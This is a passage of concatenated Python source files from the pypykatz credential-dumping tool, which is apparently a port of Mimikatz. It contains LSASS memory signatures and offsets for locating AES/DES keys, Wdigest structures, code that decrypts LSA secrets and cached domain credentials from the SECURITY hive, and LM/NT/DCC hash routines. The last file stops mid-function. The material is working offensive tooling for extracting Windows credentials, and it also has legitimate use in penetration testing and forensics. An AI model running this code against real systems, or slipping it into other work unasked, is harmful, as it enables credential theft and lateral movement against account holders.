		self.signature = None #byte pattern that identifies the location of the key structures (AES and DES)
		self.offset_to_IV_ptr = None #offset from pattern that gives the pointer to the IV (applicabe for both keys, kept sepparately from key structures)
		self.IV_length = None #length of the IV, always 16 from NT6
		self.offset_to_AES_key_ptr = None #offset from signature that gives the pointer to the DES key structure
		self.offset_to_DES_key_ptr = None #offset from signature that gives the pointer to the AES key structure
		
class KIWI_HARD_KEY:
	def __init__(self, reader):
		self.cbSecret = ULONG(reader).value
		self.data = reader.read(self.cbSecret)
		
class KIWI_BCRYPT_KEY:
	def __init__(self, reader):
		self.size = ULONG(reader).value
		self.tag = reader.read(4)
		self.type = ULONG(reader).value
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = ULONG(reader).value
		self.hardkey = KIWI_HARD_KEY(reader)
		
	def verify(self):
		return self.tag == b'KSSM'

class KIWI_BCRYPT_KEY8:
	def __init__(self, reader):
		self.size = ULONG(reader).value
		self.tag  = reader.read(4)	# 'MSSK'
		self.type = ULONG(reader).value
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = ULONG(reader).value
		self.unk3 = ULONG(reader).value
		reader.align()
		self.unk4 = PVOID(reader).value	# before, align in x64
		self.hardkey = KIWI_HARD_KEY(reader)
		
	def verify(self):
		return self.tag == b'KSSM' 

class KIWI_BCRYPT_KEY81:
	def __init__(self, reader):
		self.size = ULONG(reader).value
		self.tag  = reader.read(4)	# 'MSSK'
		self.type = ULONG(reader).value
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = ULONG(reader).value 
		self.unk3 = ULONG(reader).value
		self.unk4 = ULONG(reader).value
		reader.align()
		self.unk5 = PVOID(reader).value	#before, align in x64
		self.unk6 = ULONG(reader).value
		self.unk7 = ULONG(reader).value
		self.unk8 = ULONG(reader).value
		self.unk9 = ULONG(reader).value
		self.hardkey = KIWI_HARD_KEY(reader)
		
	def verify(self):
		return self.tag == b'KSSM' 
		

class PKIWI_BCRYPT_KEY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_BCRYPT_KEY)

class KIWI_BCRYPT_HANDLE_KEY:
	def __init__(self, reader):
		self.size = ULONG(reader).value
		self.tag = reader.read(4)	# 'UUUR'
		self.hAlgorithm = PVOID(reader).value
		self.ptr_key = PKIWI_BCRYPT_KEY(reader)
		self.unk0 = PVOID(reader).value
		
	def verify(self):
		return self.tag == b'RUUU'

class LSA_x64_1(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 63
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = 25
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_2(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 59
		self.key_pattern.offset_to_DES_key_ptr = -61
		self.key_pattern.offset_to_AES_key_ptr = 25
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

				
class LSA_x64_3(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 62
		self.key_pattern.offset_to_DES_key_ptr = -70
		self.key_pattern.offset_to_AES_key_ptr = 23
		
		self.key_struct = KIWI_BCRYPT_KEY8
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_4(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 62
		self.key_pattern.offset_to_DES_key_ptr = -70
		self.key_pattern.offset_to_AES_key_ptr = 23
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY				

class LSA_x64_5(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 61
		self.key_pattern.offset_to_DES_key_ptr = -73
		self.key_pattern.offset_to_AES_key_ptr = 16
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x64_6(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 67
		self.key_pattern.offset_to_DES_key_ptr = -89
		self.key_pattern.offset_to_AES_key_ptr = 16
				
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_1(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -76
		self.key_pattern.offset_to_AES_key_ptr = -21

		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_2(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -76
		self.key_pattern.offset_to_AES_key_ptr = -21
		
		self.key_struct = KIWI_BCRYPT_KEY
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_3(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = -18
		
		self.key_struct = KIWI_BCRYPT_KEY8
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_4(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -69
		self.key_pattern.offset_to_AES_key_ptr = -18
		
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_5(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)
		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -79
		self.key_pattern.offset_to_AES_key_ptr = -22
				
		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY

class LSA_x86_6(LsaTemplate_NT6):
	def __init__(self):
		LsaTemplate_NT6.__init__(self)

		self.key_pattern = LSADecyptorKeyPattern()
		self.key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
		self.key_pattern.IV_length = 16
		self.key_pattern.offset_to_IV_ptr = 5
		self.key_pattern.offset_to_DES_key_ptr = -79
		self.key_pattern.offset_to_AES_key_ptr = -22

		self.key_struct = KIWI_BCRYPT_KEY81
		self.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY



templates = {
	'nt6' : {
		'x64' : {
			'1' : LSA_x64_1(),
			'2' : LSA_x64_2(),
			'3' : LSA_x64_3(),
			'4' : LSA_x64_4(),
			'5' : LSA_x64_5(),
			'6' : LSA_x64_6(),
		},
		'x86': {
			'1' : LSA_x86_1(),
			'2' : LSA_x86_2(),
			'3' : LSA_x86_3(),
			'4' : LSA_x86_4(),
			'5' : LSA_x86_5(),
			'6' : LSA_x86_6(),
		}
	}
}


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

#import io
#from minidump.win_datatypes import *
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild
from pypykatz.commons.win_datatypes import LUID, ULONG, POINTER
from pypykatz.lsadecryptor.package_commons import PackageTemplate

class WdigestTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Wdigest')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		self.primary_offset = None
	
	@staticmethod
	def get_template(sysinfo):
		template = WdigestTemplate()

		if sysinfo.architecture == KatzSystemArchitecture.X64:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x48\x3b\xda\x74'
				template.first_entry_offset = -4
				template.primary_offset = 36
				template.list_entry = PWdigestListEntry
				
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x48\x3b\xda\x74'
				template.first_entry_offset = -4
				template.primary_offset = 48
				template.list_entry = PWdigestListEntry

			elif sysinfo.buildnumber >= WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x48\x3b\xd9\x74'
				template.first_entry_offset = -4
				template.primary_offset = 48
				template.list_entry = PWdigestListEntry
				
			else:
				raise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x74\x18\x8b\x4d\x08\x8b\x11'
				template.first_entry_offset = -6
				template.primary_offset = 36
				template.list_entry = PWdigestListEntryNT5

			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x74\x18\x8b\x4d\x08\x8b\x11'
				template.first_entry_offset = -6
				template.primary_offset = 28
				template.list_entry = PWdigestListEntryNT5
								
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x74\x11\x8b\x0b\x39\x4e\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:
				template.signature = b'\x74\x15\x8b\x0a\x39\x4e\x10'
				template.first_entry_offset = -4
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
			
			elif sysinfo.buildnumber >= WindowsMinBuild.WIN_10.value:
				template.signature = b'\x74\x15\x8b\x0a\x39\x4e\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
				
			else:
				template.signature = b'\x74\x15\x8b\x17\x39\x56\x10'
				template.first_entry_offset = -6
				template.primary_offset = 32
				template.list_entry = PWdigestListEntry
		
		else:
			raise Exception('Unknown architecture! %s' % sysinfo.architecture)
		
		template.log_template('list_entry', template.list_entry)
		return template
	

class PWdigestListEntry(POINTER):
	def __init__(self, reader):
		super().__init__(reader, WdigestListEntry)
		
class PWdigestListEntryNT5(POINTER):
	def __init__(self, reader):
		super().__init__(reader, WdigestListEntryNT5)
		
class WdigestListEntryNT5:
	def __init__(self, reader):
		self.Flink = PWdigestListEntryNT5(reader)
		self.Blink = PWdigestListEntryNT5(reader)
		self.this_entry = PWdigestListEntryNT5(reader)
		self.usage_count = ULONG(reader)
		reader.align() #8?
		self.luid = LUID(reader).value


class WdigestListEntry:
	def __init__(self, reader):
		self.Flink = PWdigestListEntry(reader)
		self.Blink = PWdigestListEntry(reader)
		self.usage_count = ULONG(reader)
		reader.align() #8?
		self.this_entry = PWdigestListEntry(reader)
		self.luid = LUID(reader).value


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import hashlib
import hmac
from pypykatz.registry.sam.structures import *
from pypykatz.crypto.RC4 import RC4
from pypykatz.crypto.aes import AESModeOfOperationCBC,AESModeOfOperationECB, Decrypter
from pypykatz.crypto.des import *


#####
from pypykatz.registry.security.structures import *
from pypykatz.registry.security.common import *
from pypykatz.registry import logger
from pypykatz.commons.common import hexdump

#
# The SECURITY hive holds all the domain-cached-credentials for the domain users who logged in to the machine
# It also holds the machine account's password in an encrypted form
#
# The LSA secrets also stored here, but their format is not always documented, 
# as this functionality can be used by any service that wants to stroe some secret information

class SECURITY:
	def __init__(self, security_hive, bootkey):
		self.hive = security_hive
		self.bootkey = bootkey
		
		self.dcc_iteration_count = 10240
		self.lsa_secret_key_vista_type = True
		
		self.lsa_key = None
		self.NKLM_key = None
		
		self.dcc_hashes = []
		self.cached_secrets = []
	
	@staticmethod
	def sha256_multi(key, value, rounds = 1000):
		ctx = hashlib.sha256(key)
		for _ in range(rounds):
			ctx.update(value)
		return ctx.digest()
		
	def decrypt_lsa_key(self, data):
		logger.debug('[SECURITY] Decrypting LSA key...')
		if self.lsa_secret_key_vista_type is True:
			record = LSA_SECRET.from_bytes(data)
			key = SECURITY.sha256_multi(self.bootkey, record.data[:32])
			secret_dec = b''
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
					block += b'\x00' * (n - len(block))
				secret_dec += cipher.decrypt(block)
			record = LSA_SECRET_BLOB.from_bytes(secret_dec)
			self.lsa_key = record.secret[52:][:32]
		
		else:
			ctx = hashlib.md5(self.bootkey)
			for i in range(1000):
				ctx.update(data[60:76])
			
			cipher = RC4(ctx.digest())
			record = cipher.decrypt(data[12:60])
			self.lsa_key = record[0x10:0x20]
		
		logger.debug('[SECURITY] LSA key value: %s' % self.lsa_key.hex())
		return self.lsa_key
			
		
	async def get_lsa_key(self):
		logger.debug('[SECURITY] Fetching LSA key...')
		value = await self.hive.get_value('Policy\\PolEKList\\default', False)
		if value is None:
			value = await self.hive.get_value('Policy\\PolSecretEncryptionKey\\default', False)
			if not value:
				logger.debug('[SECURITY] LSA key not found!')
				return None
			
			self.lsa_secret_key_vista_type = False
			logger.debug('[SECURITY] LSA secrets default to VISTA type')
		
		return self.decrypt_lsa_key(value[1])
		
		
	def decrypt_secret(self, key, value):
		dec_blob = b''
		enc_size = int.from_bytes(value[:4], 'little', signed = False)
		value = value[len(value) - enc_size:]
		t_key = key
		for _ in range(0, len(value), 8):
			enc_blob = value[:8]
			des_key = expand_DES_key(t_key[:7])
			ctx = des(des_key)
			dec_blob += ctx.decrypt(enc_blob)
			t_key = t_key[7:]
			value = value[8:]
			if len(t_key) < 7:
				t_key = key[len(t_key) : ]
			
		secret = LSA_SECRET_XP.from_bytes(dec_blob)
		return secret.secret
		
	async def get_NKLM_key(self):
		logger.debug('[SECURITY] Fetching NK$LM key...')
		if self.lsa_key is None:
			await self.get_lsa_key()
			
		value = await self.hive.get_value('Policy\\Secrets\\NL$KM\\CurrVal\\default')
		if value is None:
			logger.error('[SECURITY] Could not find NL$KM in registry')
			raise Exception('Could not find NL$KM in registry :(')
			
		if self.lsa_secret_key_vista_type is True:
			self.NKLM_key = b''
			record = LSA_SECRET.from_bytes(value[1])
			key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
					block += b'\x00' * (16 - len(block))
				self.NKLM_key += cipher.decrypt(block)
			
		else:
			self.NKLM_key = self.decrypt_secret(self.lsa_key, value[1])
		
		logger.debug('[SECURITY] NL$KM key: %s' % self.NKLM_key.hex())
		return self.NKLM_key
		
	def __pad(self, data):
		if (data & 0x3) > 0:
			return data + (data & 0x3)
		else:
			return data
		
	async def dump_dcc(self):
		logger.debug('[SECURITY] dump_dcc invoked')
		cache_reg = await self.hive.find_key('Cache', False)
		if cache_reg is None:
			logger.debug('[SECURITY] No DCC secrets found')
			return
		values = await self.hive.list_values(cache_reg)
		
		if values == []:
			logger.debug('[SECURITY] No DCC secrets found')
			return
			
		if b'NL$Control' in values:
			values.remove(b'NL$Control')
			
		if b'NL$IterationCount' in values:
			logger.debug('[SECURITY] DCC Setting iteration count')
			values.remove(b'NL$IterationCount')
			record = await self.hive.get_value('Cache\\NL$IterationCount')
			record = record[1]
			if record > 10240:
				self.dcc_iteration_count = record & 0xfffffc00
			else:
				self.dcc_iteration_count = record * 1024
				
		
		await self.get_lsa_key()
		await self.get_NKLM_key()
		
		for value in values:
			logger.debug('[SECURITY] DCC Checking value: %s' % value)
			record_data = await self.hive.get_value('Cache\\%s' % value.decode())
			record_data = record_data[1]
			record = NL_RECORD.from_bytes(record_data)
			
			if record.IV != b'\x00'*16:
				if record.Flags & 1 == 1:
					# Encrypted
					if self.lsa_secret_key_vista_type is True:
						plaintext = b''
						cipher = AESModeOfOperationCBC(self.NKLM_key[16:32], iv = record.IV)
						n = 16
						for block in [record.EncryptedData[i:i+n] for i in range(0, len(record.EncryptedData), n)]:  #terrible, terrible workaround
							if len(block) < 16:
								block += b'\x00' * (16 - len(block))
							plaintext += cipher.decrypt(block)
							
					else:
						key = hmac.new(self.NKLM_key,record.IV).digest()
						cipher = RC4(key)
						plaintext = cipher.decrypt(record.EncryptedData)
						
				else:
					# Plain! Until we figure out what this is, we skip it
					#plainText = record['EncryptedData']
					logger.debug('[SECURITY] DCC Skipping value %s, unknown formet' % value)
					continue
				
				
				dcc_hash = plaintext[:0x10]
				blob = io.BytesIO(plaintext[0x48:])
				username = blob.read(record.UserLength).decode('utf-16-le')
				blob.seek(self.__pad(record.UserLength) + self.__pad(record.DomainNameLength))
				domain = blob.read(record.DnsDomainNameLength).decode('utf-16-le')
				
				version = 2 if self.lsa_secret_key_vista_type is True else 1
				secret = LSADCCSecret(version, domain, username, dcc_hash, iteration = self.dcc_iteration_count)
				self.dcc_hashes.append(secret)
				
		return self.dcc_hashes	
				
	async def get_secrets(self):
		logger.debug('[SECURITY] get_secrets')
		await self.get_lsa_key()
		
		await self.dump_dcc()
		
		# Let's first see if there are cached entries
		keys = await self.hive.enum_key('Policy\\Secrets')
		if keys is None:
			logger.debug('[SECURITY] No cached secrets found in hive')
			return
			
		if b'NL$Control' in keys:
			keys.remove(b'NL$Control')
		
		for key_name in keys:
			for vl in ['CurrVal', 'OldVal']:
				key_path = 'Policy\\Secrets\\{}\\{}\\default'.format(key_name,vl)
				logger.debug('[SECURITY] Parsing secrets in %s' % key_path)
				v = await self.hive.get_value(key_path, False)
				if v and v[1] != 0:
					logger.log(1, '[SECURITY] Key %s Value %s' % (key_path, v[1]))
					if self.lsa_secret_key_vista_type is True:
						record = LSA_SECRET.from_bytes(v[1])
						key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
						secret_dec = b''
						cipher = AESModeOfOperationECB(key)
						n = 16
						for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
							if len(block) < n:
								block += b'\x00' * (n - len(block))
							secret_dec += cipher.decrypt(block)
						record = LSA_SECRET_BLOB.from_bytes(secret_dec)
						dec_blob = record.secret
						
					else:
						dec_blob = self.decrypt_secret(self.lsa_key, v[1])
						
					secret = LSASecret.process(key_name, dec_blob, vl == 'OldVal')
					if secret is not None:
						self.cached_secrets.append(secret)
					
				else:
					logger.debug('[SECURITY] Could not open %s, skipping!' % key_path)
	
	def to_dict(self):
		t = {}
		t['dcc_iteration_count'] = self.dcc_iteration_count
		t['secrets_format'] = 'VISTA' if self.lsa_secret_key_vista_type else 'OLD'
		t['lsa_key'] = self.lsa_key
		t['NK$LM'] = None
		if self.NKLM_key is not None:
			t['NK$LM'] = self.NKLM_key
		t['dcc'] = []
		for secret in self.dcc_hashes:
			t['dcc'].append(secret.to_dict())
		t['cached_secrets'] = []
		for secret in self.cached_secrets:
			t['cached_secrets'].append(secret.to_dict())
		return t
	
	def __str__(self):
		t  = '============== SECURITY hive secrets ==============\r\n'
		t += 'Iteration count: %s\r\n' % self.dcc_iteration_count
		t += 'Secrets structure format : %s\r\n' %  'VISTA' if self.lsa_secret_key_vista_type else 'OLD'
		t += 'LSA Key: %s\r\n' % self.lsa_key.hex()
		if self.NKLM_key is not None:
			t += 'NK$LM Key: %s\r\n' % self.NKLM_key.hex()
		for secret in self.dcc_hashes:
			t += '%s\r\n' % secret.to_lopth()
		for secret in self.cached_secrets:
			t += '%s\r\n' % str(secret)
		return t



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import platform
from pypykatz import logger
import winreg

from pypykatz.commons.winapi.local.localwindowsapi import LocalWindowsAPI
from pypykatz.commons.winapi.constants import *
from pypykatz.commons.readers.registry.live.reader import LiveRegistryHive

class User:
	def __init__(self, name, domain, sid):
		self.username = name
		self.domain = domain
		self.sid = sid
		
	def __str__(self):
		return '%s:%s:%s' % (str(self.domain), str(self.username), str(self.sid))

class LiveMachine:
	"""
	
	"""
	def __init__(self, api = None):
		self.api = api if api is not None else LocalWindowsAPI()
		self.domain = None
		self.hostname = None
		
	def get_hostname(self):
		if self.hostname is None:
			params = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters')
			self.hostname = winreg.QueryValueEx(params, 'NV Hostname')[0]
		return self.hostname
		
	def get_domain(self):
		if self.domain is None:
			params = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters')
			self.domain = winreg.QueryValueEx(params, 'Domain')[0]
		return self.domain
		
	def get_current_user(self):
		pid = self.api.kernel32.GetCurrentProcessId()
		proc_handle = self.api.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
		token_handle = self.api.advapi32.OpenProcessToken(proc_handle, TOKEN_MANIP_ACCESS)
		ptr_sid = self.api.advapi32.GetTokenInformation_sid(token_handle)
		sid_str = self.api.advapi32.ConvertSidToStringSid(ptr_sid)
		name, domain, token_type = self.api.advapi32.LookupAccountSid(None, ptr_sid)
		return User(name, domain, sid_str)
		
	def list_users(self):
		logger.debug('Listing SIDs from registry...')
		software_hive = LiveRegistryHive('SOFTWARE')
		users = {}
		for sid_str in software_hive.enum_key('Microsoft\\Windows NT\\CurrentVersion\\ProfileList'):
			if sid_str.endswith('_Classes') or sid_str.startswith('.'):
				continue
			ptr_sid = self.api.advapi32.ConvertStringSidToSid(sid_str.encode())
			name, domain, token_type = self.api.advapi32.LookupAccountSid(None, ptr_sid)
			users[sid_str] = User(name, domain, sid_str)
		return users
			
if __name__ == '__main__':
	u = LiveMachine()
	t = u.list_users()
	for sid in t:
		print(str(t[sid]))
	t = u.get_current_user()
	print(str(t))


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import hashlib
from pypykatz.crypto.unified.des import DES, expand_DES_key
from pypykatz.crypto.unified.pbkdf2 import pbkdf2

def LM(password):
	if password is None:
		return bytes.fromhex('aad3b435b51404eeaad3b435b51404ee')
	LM_SECRET = b'KGS!@#$%'
	password_uppercase = password.upper()
	password_uppercase_bytes = password_uppercase.encode('ascii')
	password_uppercase_bytes_padded = password_uppercase_bytes.ljust(14, b'\x00')
	password_chunk_1 = password_uppercase_bytes_padded[0:7]
	password_chunk_2 = password_uppercase_bytes_padded[7:]
	des_chunk_1 = DES(expand_DES_key(password_chunk_1))
	des_chunk_2 = DES(expand_DES_key(password_chunk_2))
	des_first_half = des_chunk_1.encrypt(LM_SECRET)
	des_second_half = des_chunk_2.encrypt(LM_SECRET)
	lm_hash = des_first_half + des_second_half
	
	return lm_hash

def NT(password):
	if password is None:
		return bytes.fromhex('31d6cfe0d16ae931b73c59d7e0c089c0')
	password_bytes = password.encode('utf-16-le')
	md4 = hashlib.new('md4')
	md4.update(password_bytes)
	nt_hash =  md4.digest()	
	return nt_hash
	
def MSDCC(username, password):
	nt_hash_of_password = NT(password)
	username_lower = username.lower()
	username_bytes = username_lower.encode('utf-16-le')
	md4 = hashlib.new('md4')
	md4.update(nt_hash_of_password)
	md4.update(username_bytes)
	dcc =  md4.digest()
	return dcc
	
def MSDCCv2(username, password, iterations = 10240):
	#The iteration count is by default 10240 but it depends on the HKEY_LOCAL_MACHINE\SECURITY\Cache\NL$IterationCount key value.
	msdcc_hash = MSDCC(username, password)
	username_lower = username.lower()
	username_bytes = username_lower.encode('utf-16-le')
	msdcc_v2 = pbkdf2(msdcc_hash, username_bytes, iterations, 16)
	hashcat_format = '$DCC2$%s#%s#%s' % (iterations, username, msdcc_v2.hex())

	return msdcc_v2


#!/usr/bin/env python

"""
	Copyright (C) 2013 Bo Zhu http://about.bozhu.me

	Permission is hereby granted, free of charge, to any person obtaining a
	copy of this software and associated documentation files (the "Software"),
	to deal in the Software without restriction, including without limitation
	the rights to use, copy, modify, merge, publish, distribute, sublicense,
	and/or sell copies of the Software, and to permit persons to whom the
	Software is furnished to do so, subject to the following conditions:

	The above copyright notice and this permission notice shall be included in
	all copies or substantial portions of the Software.

	THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
	IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
	FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
	THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
	LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
	FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
	DEALINGS IN THE SOFTWARE.

	SkelSec Note: the original code has been modified to work using questionable crypto libraries by myself who is not a cryptographer.
	              I'd say "use it with suspicion" but in truth: just do not use this at all outside of this library.
"""

from pypykatz.crypto.aes import AESModeOfOperationCTR, AESModeOfOperationECB, Counter
from pypykatz.crypto.aes.blockfeeder import Decrypter, Encrypter, PADDING_NONE


# GF(2^128) defined by 1 + a + a^2 + a^7 + a^128
# Please note the MSB is x0 and LSB is x127
def gf_2_128_mul(x, y):
	assert x < (1 << 128)
	assert y < (1 << 128)
	res = 0
	for i in range(127, -1, -1):
		res ^= x * ((y >> i) & 1)  # branchless
		x = (x >> 1) ^ ((x & 1) * 0xE1000000000000000000000000000000)
	assert res < 1 << 128
	return res


class InvalidInputException(Exception):
	def __init__(self, msg):
		self.msg = msg

	def __str__(self):
		return str(self.msg)


class InvalidTagException(Exception):
	def __str__(self):
		return 'The authenticaiton tag is invalid.'


# Galois/Counter Mode with AES-128 and 96-bit IV
class AES_GCM:
	def __init__(self, master_key):
		self.change_key(master_key)

	def change_key(self, master_key):
		#if len(master_key) != 16:
		#	raise InvalidInputException('Master key should be 128-bit')

		self.__master_key = master_key
		self.__aes_ecb = AESModeOfOperationECB(self.__master_key)
		self.__auth_key = int.from_bytes(self.__aes_ecb.encrypt(b'\x00' * 16), byteorder='big', signed=False)

		# precompute the table for multiplication in finite field
		table = []  # for 8-bit
		for i in range(16):
			row = []
			for j in range(256):
				row.append(gf_2_128_mul(self.__auth_key, j << (8 * i)))
			table.append(tuple(row))
		self.__pre_table = tuple(table)

		self.prev_init_value = None  # reset

	def __times_auth_key(self, val):
		res = 0
		for i in range(16):
			res ^= self.__pre_table[i][val & 0xFF]
			val >>= 8
		return res

	def __ghash(self, aad, txt):
		len_aad = len(aad)
		len_txt = len(txt)

		# padding
		if 0 == len_aad % 16:
			data = aad
		else:
			data = aad + b'\x00' * (16 - len_aad % 16)
		if 0 == len_txt % 16:
			data += txt
		else:
			data += txt + b'\x00' * (16 - len_txt % 16)

		tag = 0
		assert len(data) % 16 == 0
		for i in range(len(data) // 16):
			tag ^= int.from_bytes(data[i * 16: (i + 1) * 16], byteorder='big', signed=False)
			tag = self.__times_auth_key(tag)
			# print 'X\t', hex(tag)
		tag ^= ((8 * len_aad) << 64) | (8 * len_txt)
		tag = self.__times_auth_key(tag)

		return tag

	def encrypt(self, init_value, plaintext, auth_data=b''):
		if len(init_value) != 12:
			raise InvalidInputException('IV should be 96-bit')
		# a naive checking for IV reuse
